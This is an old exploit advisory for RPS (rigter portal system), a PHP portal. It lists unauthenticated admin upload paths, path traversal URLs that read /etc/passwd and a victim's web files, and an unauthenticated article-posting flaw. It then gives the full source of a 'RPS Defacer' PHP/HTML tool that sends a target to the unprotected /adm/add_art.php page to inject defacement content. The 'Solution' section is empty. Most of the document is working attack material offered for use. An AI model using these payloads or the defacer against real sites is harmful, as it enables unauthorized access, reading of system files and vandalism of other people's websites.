###########################################################################<br># Advisory #13 Title: Multiple Vulnerabilities RPS (rigter portal system)<br># <br># <br># Author: 0o_zeus_o0 ( Arturo Z. )<br># Contact: <a href="mailto:zeus@diosdelared.com">
zeus@diosdelared.com</a><br># Website: <a href="http://www.elitemexico.org">www.elitemexico.org</a><br># Date: 18/07/06<br># Risk: medium<br># Vendor Url: <a href="http://rps.rigtersir.com/">http://rps.rigtersir.com/</a><br>
# Affected Software: RPS<br># Non Affected: RPS V 4<br>#<br>#Info:<br>##################################################################<br>#UPLOAD FILES<br># it allows the user to raise archives without having administration privileges
<br>#<br>#<br>#SQL inyección<br>#it allows the user to insert post without having to be admin with this can make xss or <br>#HTML injection<br>#<br>#<br>#example of upload files<br>##################################################################
<br>#<br>#http://www.vuln.com/[path]/adm/photos/images.php<br>#<br>#http://www.vuln.com/[path]//adm/down/files.php<br>#<br>##################################################################<br>#example&nbsp; Remote Execution<br>
##################################################################<br>#<br>#http://www.vuln.com/[path]/index.php?id=../../../../../etc/passwd<br>#<br>#http://www.vuln.com/[path]/index.php?id=../../../home/victim/public_html/index
<br>#<br>##################################################################<br>#<br>#Solution:<br>##################################################################<br>#<br>#<br>#VULNERABLE VERSIONS<br>##################################################################
<br># v1.0, 2.0 3.0<br>#<br>##################################################################<br>#Contact information<br>#0o_zeus_o0<br>#zeus@<a href="http://diosdelared.com">diosdelared.com</a><br>#www.elitemexico.org<br>
##################################################################<br>#greetz: lady fire,Mi beba, olimpus klan team and elitemexico<br># <br>#Original Advisory: <a href="http://zeus.pccentervillaflores.com//13.txt">http://zeus.pccentervillaflores.com//13.txt
</a><br>##################################################################<br><br>SQL inyección in &quot;Articulos&quot; exploit<br><br>&lt;?php<br>/*<br>RPS Defacer by: 0o_ZEUS_o0 OliMpusKlaN •~ FX ~•<br>Date: 08/01/06<br>
Website: <a href="http://www.elitemexico.org">www.elitemexico.org</a><br>*/<br>?&gt;<br>&lt;html&gt;<br><br>&lt;head&gt;<br>&lt;title&gt;RPS Defacer&lt;/title&gt;<br>&lt;/head&gt;<br><br>&lt;body text=&quot;#FFFFFF&quot; bgcolor=&quot;#000000&quot;&gt;
<br><br>&lt;p align=&quot;center&quot;&gt;&lt;font face=&quot;Verdana&quot; size=&quot;2&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;font color=&quot;#FF0000&quot;&gt;RPS Defacer&lt;br&gt;<br>&lt;br&gt;<br>&lt;/font&gt;<br>&lt;/u&gt;&lt;font color=&quot;#FF0000&quot;&gt;0o_ZEUS_o0 OliMpusKlaN &lt;br /&gt; •~ FX ~•&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
<br>&lt;form method=&quot;POST&quot;&nbsp; ACTION=&quot;?action=enviar&quot; name=&quot;rps_defacer&quot;&gt;<br>&nbsp;&nbsp;&nbsp; &lt;center&gt;<br>&nbsp;&nbsp;&nbsp; &lt;table border=&quot;0&quot; cellpadding=&quot;5&quot; cellspacing=&quot;0&quot; style=&quot;border-collapse: collapse&quot; width=&quot;40%&quot;&gt;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;td width=&quot;100%&quot;&gt;&lt;b&gt;&lt;font face=&quot;Verdana&quot; size=&quot;1&quot;&gt;Direccion:&lt;br&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;input type=&quot;text&quot; name=&quot;url&quot; size=&quot;30&quot; value=&quot;http://&quot;&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/tr&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;td width=&quot;100%&quot;&gt;&lt;b&gt;&lt;font size=&quot;1&quot; face=&quot;Verdana&quot;&gt;Autor:&lt;br&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;input type=&quot;text&quot; name=&quot;autor&quot; size=&quot;20&quot;&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/tr&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;td width=&quot;100%&quot;&gt;&lt;b&gt;&lt;font face=&quot;Verdana&quot;&gt;&lt;font size=&quot;1&quot;&gt;Email:&lt;br&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;input type=&quot;text&quot; name=&quot;email&quot; size=&quot;20&quot;&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/tr&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;td width=&quot;100%&quot;&gt;&lt;b&gt;&lt;font size=&quot;1&quot; face=&quot;Verdana&quot;&gt;Titulo:&lt;br&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;input type=&quot;text&quot; name=&quot;titulo&quot; size=&quot;30&quot;&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/tr&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;td width=&quot;100%&quot;&gt;&lt;b&gt;&lt;font size=&quot;1&quot; face=&quot;Verdana&quot;&gt;Contenido: (Soporta<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; HTML Inyection)&lt;br&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;textarea rows=&quot;13&quot; name=&quot;articulo&quot; cols=&quot;55&quot;&gt;&lt;/textarea&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/tr&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;td width=&quot;100%&quot;&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;p align=&quot;center&quot;&gt;&lt;b&gt;&lt;font face=&quot;Verdana&quot; size=&quot;1&quot;&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;input type=&quot;submit&quot; value=&quot;Enviar&quot; name=&quot;send&quot;&gt; &nbsp;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;input type=&quot;reset&quot; value=&quot;Restablecer&quot; name=&quot;delete&quot;&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/tr&gt;<br>&nbsp;&nbsp;&nbsp; &lt;/table&gt;<br>&nbsp;&nbsp;&nbsp; &lt;/center&gt;<br>&nbsp; &lt;/div&gt;<br>
&lt;/form&gt;<br>&lt;?<br><br>if($action==&quot;enviar&quot;){<br><br>$web= $_POST['url'];<br><br>echo &quot;&lt;script LANGUAGE=\&quot;JavaScript\&quot;&gt;<br><br>var pagina=\&quot;$web/adm/add_art.php\&quot;<br>function redireccionar()
<br>{<br>location.href=pagina<br>}<br>setTimeout (\&quot;redireccionar()\&quot;, 0001);<br><br>&lt;/script&gt;&quot;;<br>}<br>?&gt;<br><br>&lt;/body&gt;<br><br>&lt;/html&gt;<br><br>